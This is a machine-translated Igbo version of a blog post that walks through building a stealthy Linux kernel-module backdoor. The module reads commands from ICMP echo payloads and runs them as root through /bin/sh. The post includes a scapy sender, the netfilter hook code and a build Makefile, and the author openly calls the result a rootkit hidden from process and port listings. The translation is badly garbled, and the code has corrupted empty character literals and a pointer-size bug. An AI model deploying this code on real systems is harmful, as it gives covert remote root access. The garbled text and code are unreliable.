TL; DR: Ana m ede modul kernel nke ga-agụ iwu sitere na ụgwọ ICMP wee gbuo ha na ihe nkesa ọ bụrụgodị na SSH gị daa. Maka ndị na-enweghị ndidi, koodu niile bụ .
Kpachara anya! Ndị na-eme mmemme C nwere ahụmahụ nwere ike ịgbawa na anya mmiri nke ọbara! Enwere m ike na-ezighi ezi na okwu okwu, mana a na-anabata nkatọ ọ bụla. Ezubere post a maka ndị nwere echiche siri ike nke mmemme C ma chọọ ileba anya n'ime Linux.
N'okwu nke mbụ m kwuru SoftEther VPN, nke nwere ike iṅomi ụfọdụ ụkpụrụ “mgbe niile”, ọkachasị HTTPS, ICMP na ọbụna DNS. Enwere m ike iche na ọ bụ naanị ndị mbụ n'ime ha na-arụ ọrụ, ebe ọ bụ na m maara nke ọma HTTP(S), na m ga-amụta tunneling n'elu ICMP na DNS.
Ee, na 2020 amụtara m na ị nwere ike itinye ụgwọ akwụghị ụgwọ n'ime ngwugwu ICMP. Ma mma n'oge na-adịghị mgbe! Ebe ọ bụ na e nwere ike ime ihe banyere ya, ọ dị mkpa ka e mee ya. Ebe ọ bụ na ndụ m kwa ụbọchị, m na-ejikarị ahịrị iwu, gụnyere site na SSH, echiche nke shei ICMP batara m n'uche na mbụ. Na iji kpokọta bingo bullshield zuru ezu, ekpebiri m ide ya dị ka modul Linux n'asụsụ nke m nwere echiche siri ike. A gaghị ahụ shei dị otú ahụ na ndepụta nke usoro, ị nwere ike ibunye ya na kernel ma ọ gaghị adị na usoro faịlụ, ị gaghị ahụ ihe ọ bụla na-enyo enyo na ndepụta nke ọdụ ụgbọ mmiri na-ege ntị. N'ihe banyere ike ya, nke a bụ rootkit zuru oke, ma enwere m olileanya imeziwanye ya ma jiri ya dị ka shei nke ikpeazụ mgbe Nkwadebe Ibu dị elu dị elu ịbanye site na SSH ma mee ma ọ dịkarịa ala. echo i > /proc/sysrq-triggeriji weghachi ohere na-enweghị rebooting.
Anyị na-ewere onye ndezi ederede, nkà mmemme bụ isi na Python na C, Google na nke ị na-achọghị itinye n'okpuru mma ma ọ bụrụ na ihe niile na-agbaji (nhọrọ - local VirtualBox / KVM / wdg) ka anyị gaa!
Akụkụ ndị ahịa
Ọ dị m ka onye ahịa m ga-ede edemede nwere ihe dị ka ahịrị 80, mana enwere ndị obiọma mere m ya. . Koodu ahụ wee bụrụ nke dị mfe na-atụghị anya ya, dabara na ahịrị iri dị mkpa:
import sys
from scapy.all import sr1, IP, ICMP
if len(sys.argv) < 3:
print('Usage: {} IP "command"'.format(sys.argv[0]))
exit(0)
p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
p.show()
Edemede ahụ na-ewe arụmụka abụọ, adreesị na ibu ọrụ. Tupu izipu, ugwo a na-ebute igodo ụzọ run:, anyị ga-achọ ya ka ewepu ngwugwu nwere ụgwọ ọrụ enweghị usoro.
kernel na-achọ ihe ùgwù maka ngwungwu nka, yabụ, a ga-emerịrị edemede ahụ ka ọ bụrụ onye nlekọta. Echefula ịnye ikike igbu ma wụnye spy n'onwe ya. Debian nwere ngwugwu akpọrọ python3-scapy. Ugbu a ị nwere ike ịlele ka ọ na-arụ ọrụ.
Na-agba ọsọ ma na-ewepụta iwu ahụ
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!
Nke a bụ otú ọ dị na sniffer
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct]
[Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)
0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]
Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct]
[Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1]
[Response time: 19.094 ms]
Data (17 bytes)
0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]
^C2 packets captured
Ọnụ ego a na-akwụ na ngwugwu nzaghachi anaghị agbanwe.
Modul kernel
Iji wuo na igwe mebere Debian ị ga-achọ opekata mpe make и linux-headers-amd64, ndị ọzọ ga-abịa n'ụdị ndabere. Agaghị m enye koodu niile n'isiokwu a, ị nwere ike imechi ya na Github.
Ntọlite nko
Iji malite, anyị chọrọ ọrụ abụọ iji buo modul na ibupu ya. Achọghị ọrụ maka nbudata, mana mgbe ahụ rmmod ọ gaghị arụ ọrụ; modul ga-ebutu naanị mgbe agbanyụrụ ya.
#include <linux/module.h>
#include <linux/netfilter_ipv4.h>
static struct nf_hook_ops nfho;
static int __init startup(void)
{
nfho.hook = icmp_cmd_executor;
nfho.hooknum = NF_INET_PRE_ROUTING;
nfho.pf = PF_INET;
nfho.priority = NF_IP_PRI_FIRST;
nf_register_net_hook(&init_net, &nfho);
return 0;
}
static void __exit cleanup(void)
{
nf_unregister_net_hook(&init_net, &nfho);
}
MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);Kedu ihe na-eme ebe a:
- A na-adọta faịlụ nkụnye eji isi mee abụọ iji megharịa modul n'onwe ya yana netfilter.
- Ọrụ niile na-aga site na netfilter, ị nwere ike ịtọ nko na ya. Iji mee nke a, ịkwesịrị ịkọwapụta usoro nke a ga-ahazi nko. Ihe kachasị mkpa bụ ịkọwapụta ọrụ a ga-arụ dị ka nko:
nfho.hook = icmp_cmd_executor;Aga m enweta ọrụ ahụ n'onwe ya ma emechaa.
Mgbe ahụ, etinyere m oge nhazi maka ngwugwu:NF_INET_PRE_ROUTINGna-akọwapụta ịhazi ngwugwu ahụ mgbe mbụ ọ pụtara na kernel. Enwere ike ijiNF_INET_POST_ROUTINGiji hazie ngwugwu ahụ ka ọ na-apụ na kernel.
Etinyere m nzacha na IPv4:nfho.pf = PF_INET;.
Ana m enye nko m ihe kacha mkpa:nfho.priority = NF_IP_PRI_FIRST;
Ana m edebanye aha usoro data dị ka nko n'ezie:nf_register_net_hook(&init_net, &nfho); - Ọrụ ikpeazụ na-ewepụ nko.
- E gosipụtara akwụkwọ ikike ahụ nke ọma ka onye nchịkọta ghara ime mkpesa.
- Ọrụ
module_init()иmodule_exit()tọọ ọrụ ndị ọzọ ka ịmalite na kwụsị modul.
Na-eweghachite ibu akwụ ụgwọ
Ugbu a, anyị kwesịrị iwepụ ụgwọ ọrụ, nke a mechara bụrụ ọrụ kacha sie ike. kernel enweghị ọrụ arụnyere maka ịrụ ọrụ na ibu akwụ ụgwọ;
#include <linux/ip.h>
#include <linux/icmp.h>
#define MAX_CMD_LEN 1976
char cmd_string[MAX_CMD_LEN];
struct work_struct my_work;
DECLARE_WORK(my_work, work_handler);
static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
struct iphdr *iph;
struct icmphdr *icmph;
unsigned char *user_data;
unsigned char *tail;
unsigned char *i;
int j = 0;
iph = ip_hdr(skb);
icmph = icmp_hdr(skb);
if (iph->protocol != IPPROTO_ICMP) {
return NF_ACCEPT;
}
if (icmph->type != ICMP_ECHO) {
return NF_ACCEPT;
}
user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
tail = skb_tail_pointer(skb);
j = 0;
for (i = user_data; i != tail; ++i) {
char c = *(char *)i;
cmd_string[j] = c;
j++;
if (c == '')
break;
if (j == MAX_CMD_LEN) {
cmd_string[j] = '';
break;
}
}
if (strncmp(cmd_string, "run:", 4) != 0) {
return NF_ACCEPT;
} else {
for (j = 0; j <= sizeof(cmd_string)/sizeof(cmd_string[0])-4; j++) {
cmd_string[j] = cmd_string[j+4];
if (cmd_string[j] == '')
break;
}
}
schedule_work(&my_work);
return NF_ACCEPT;
}Kedu nke na-eme:
- Ekwesịrị m itinye faịlụ nkụnye eji isi mee, oge a iji megharịa IP na nkụnye isi ICMP.
- Etinyere m ogologo ahịrị kachasị:
#define MAX_CMD_LEN 1976. Gịnị kpatara nke a kpọmkwem? N'ihi na ndị nchịkọta akụkọ na-eme mkpesa banyere ya! Ha atụworị m aro na m kwesịrị ịghọta nchịkọta na ikpo okwu, otu ụbọchị m ga-eme nke a ma eleghị anya ọbụna mezie koodu ahụ. Etinyere m ahịrị ozugbo ga-enwe iwu:char cmd_string[MAX_CMD_LEN];. Ekwesịrị ịhụ ya na ọrụ niile, Aga m ekwu maka nke a n'ụzọ zuru ezu na paragraf 9. - Ugbu a, anyị kwesịrị ịmalite (
struct work_struct my_work;) nhazi ma jikọọ ya na ọrụ ọzọ (DECLARE_WORK(my_work, work_handler);). M ga-ekwukwa banyere ihe kpatara nke a ji dị mkpa na paragraf nke itoolu. - Ugbu a, m na-ekwupụta ọrụ, nke ga-abụ nko. Ụdị na arụmụka anabatara bụ nke netfilter na-ekpebi, anyị nwere mmasị na ya
skb. Nke a bụ ihe nchekwa oghere, usoro data bụ isi nke nwere ozi niile dị gbasara ngwugwu. - Maka ọrụ ahụ ka ọ rụọ ọrụ, ị ga-achọ nhazi abụọ na ọtụtụ mgbanwe, gụnyere ndị na-emegharị ugboro abụọ.
struct iphdr *iph; struct icmphdr *icmph; unsigned char *user_data; unsigned char *tail; unsigned char *i; int j = 0; - Anyị nwere ike ịmalite na mgbagha. Ka modul ahụ rụọ ọrụ, ọ nweghị ngwugwu ndị ọzọ karịa ICMP Echo achọrọ, yabụ anyị na-atụgharị ihe nchekwa ahụ site na iji ọrụ arụnyere ma tụfuo ngwugwu niile na-abụghị ICMP na ndị na-abụghị Echo. laghachi
NF_ACCEPTpụtara nnabata nke ngwugwu, mana ị nwekwara ike dobe ngwugwu site na ịlaghachiNF_DROP.iph = ip_hdr(skb); icmph = icmp_hdr(skb); if (iph->protocol != IPPROTO_ICMP) { return NF_ACCEPT; } if (icmph->type != ICMP_ECHO) { return NF_ACCEPT; }Anwalebeghị m ihe ga-eme na-enyochaghị nkụnye eji isi mee IP. Obere ihe m maara banyere C na-agwa m na na-enweghị nyocha ọzọ, ihe jọgburu onwe ya ga-eme. Obi ga-adị m ụtọ ma ọ bụrụ na ị mebie m nke a!
- Ugbu a na ngwugwu bụ ụdị nke ịchọrọ, ị nwere ike wepụ data ahụ. Na-enweghị arụ ọrụ arụnyere, ị ga-ebu ụzọ nweta ntụnye na mmalite nke ụgwọ ọrụ. Emere nke a n'otu ebe, ịkwesịrị iburu pointer na mmalite nke nkụnye eji isi mee ICMP wee bugharịa ya na nha nke nkụnye eji isi mee a. Ihe niile na-eji usoro
icmph:user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
Ọgwụgwụ nke nkụnye eji isi mee ga-adakọrịrị na njedebe nke ụgwọ n'imeskbYa mere, anyị na-enweta ya site na iji ngwa nuklia site na nhazi kwekọrọ:tail = skb_tail_pointer(skb);.
Ezuru foto a , ị nwere ike ịgụkwu gbasara oghere oghere. - Ozugbo ị nwere ntụnye aka na mmalite na njedebe, ị nwere ike iṅomi data n'ime eriri
cmd_string, lelee ya maka ọnụnọ nke prefixrun:na, ma tufuo ngwugwu ma ọ bụrụ na ọ na-efu, ma ọ bụ degharịa ahịrị ahụ ọzọ, wepụ prefix a. - Nke ahụ bụ ya, ugbu a ị nwere ike ịkpọ onye njikwa ọzọ:
schedule_work(&my_work);. Ebe ọ bụ na ọ gaghị ekwe omume ịfefe paramita na oku dị otú ahụ, ahịrị nwere iwu ahụ ga-abụrịrị zuru ụwa ọnụ.schedule_work()ga-etinye ọrụ jikọtara ya na ihe owuwu gafere n'ime ahịrị n'ozuzu nke onye nhazi ọrụ ma mezue, na-ahapụ gị ka ị ghara ichere ka iwu ahụ mezue. Nke a dị mkpa n'ihi na nko ga-adị ngwa ngwa. Ma ọ bụghị ya, nhọrọ gị bụ na ọ nweghị ihe ga-amalite ma ọ bụ na ị ga-enwe ụjọ kernel. igbu oge dị ka ọnwụ! - Nke ahụ bụ ya, ị nwere ike ịnakwere ngwugwu na nloghachi kwekọrọ.
Na-akpọ mmemme na oghere ọrụ
Ọrụ a bụ nke kachasị nghọta. Enyere aha ya DECLARE_WORK(), ụdị na arụmụka anabatara adịghị adọrọ mmasị. Anyị na-ewere ahịrị na iwu ahụ ma nyefee ya kpamkpam na shei. Ka o mee ihe gbasara ntughari, na-achọ ọnụọgụ abụọ na ihe ọ bụla ọzọ.
static void work_handler(struct work_struct * work)
{
static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
static char *envp[] = {"PATH=/bin:/sbin", NULL};
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}- Tọọ arụmụka ahụ ka ọ bụrụ ọtụtụ eriri
argv[]. M ga-eche na onye ọ bụla maara na mmemme na-egbu n'ezie otú a, na ọ bụghị dị ka a na-aga n'ihu akara na oghere. - Tọọ mgbanwe gburugburu ebe obibi. Etinyere m naanị PATH nwere obere ụzọ ụzọ, na-atụ anya na ejikọtala ha niile
/binс/usr/binи/sbinс/usr/sbin. Ụzọ ndị ọzọ adịkarịghị mkpa na omume. - Emechaala, ka anyị mee ya! Ọrụ kernel
call_usermodehelper()na-anabata ntinye. ụzọ na ọnụọgụ abụọ, ọtụtụ arụmụka, ọtụtụ mgbanwe gburugburu ebe obibi. N'ebe a, m na-eche na onye ọ bụla ghọtara ihe ọ pụtara ịgafe ụzọ na faịlụ executable dị ka arụmụka dị iche, ma ị nwere ike ịjụ. Arụmụka ikpeazụ na-akọwapụta ma ọ ga-echere ka usoro a ga-agwụ (UMH_WAIT_PROC), mmalite usoro (UMH_WAIT_EXEC) ma ọ bụ echere ma ọlị (UMH_NO_WAIT). Ọ nwere ndị ọzọUMH_KILLABLE, Achọghị m ya.
Mgbakọ
A na-eme mgbakọ nke modul kernel site na kernel make-framework. Akpọrọ make n'ime akwụkwọ ndekọ aha pụrụ iche ejikọtara na ụdị kernel (akọwapụtara ebe a: KERNELDIR:=/lib/modules/$(shell uname -r)/build), na ebe modul ahụ gafere na mgbanwe M na arụmụka. icmpshell.ko na ebumnuche dị ọcha na-eji usoro a kpamkpam. N'ime obj-m na-egosi faịlụ ihe a ga-atụgharị ka ọ bụrụ modul. Syntax nke na-emegharị main.o в icmpshell.o (icmpshell-objs = main.o) anaghị ele m anya nke ọma, mana ka ọ dị.
KERNELDIR:=/lib/modules/$(shell uname -r)/build
obj-m = icmpshell.o
icmpshell-objs = main.o
all: icmpshell.ko
icmpshell.ko: main.c
make -C $(KERNELDIR) M=$(PWD) modules
clean:
make -C $(KERNELDIR) M=$(PWD) clean
Anyị na-anakọta: make. Na-ebu: insmod icmpshell.ko. Emechaala, ị nwere ike ịlele: sudo ./send.py 45.11.26.232 "date > /tmp/test". Ọ bụrụ na ị nwere faịlụ na igwe gị /tmp/test na o nwere ụbọchị ezigara arịrịọ ahụ, nke pụtara na ị mere ihe niile nke ọma na m mere ihe niile nke ọma.
nkwubi
Ahụmahụ mbụ m nwere banyere mmepe nuklia dị nnọọ mfe karịa ka m tụrụ anya ya. Ọbụna na-enweghị ahụmahụ na-emepe emepe na C, na-elekwasị anya na nchịkọta nchịkọta na nsonaazụ Google, enwere m ike ide modul na-arụ ọrụ ma nwee mmetụta dị ka onye na-agba ọsọ kernel, na n'otu oge ahụ nwa akwụkwọ edemede. Tụkwasị na nke ahụ, agara m na ọwa Kernel Newbies, bụ́ ebe a gwara m ka m jiri ya mee ihe schedule_work() kama ịkpọ call_usermodehelper() n'ime nko n'onwe ya na-emenye ya ihere, n'ụzọ ziri ezi suspecting a ojoro. Otu narị ahịrị koodu na-eri m ihe dị ka otu izu nke mmepe na oge efu m. Ahụmahụ na-aga nke ọma nke mebiri akụkọ ifo nke onwe m banyere mgbagwoju anya nke mmepe usoro.
Ọ bụrụ na mmadụ ekweta ime nyocha koodu na Github, a ga m enwe ekele. Eji m n'aka na m mehiere ọtụtụ ihe nzuzu, ọkachasị mgbe ejiri eriri na-arụ ọrụ.
isi: www.habr.com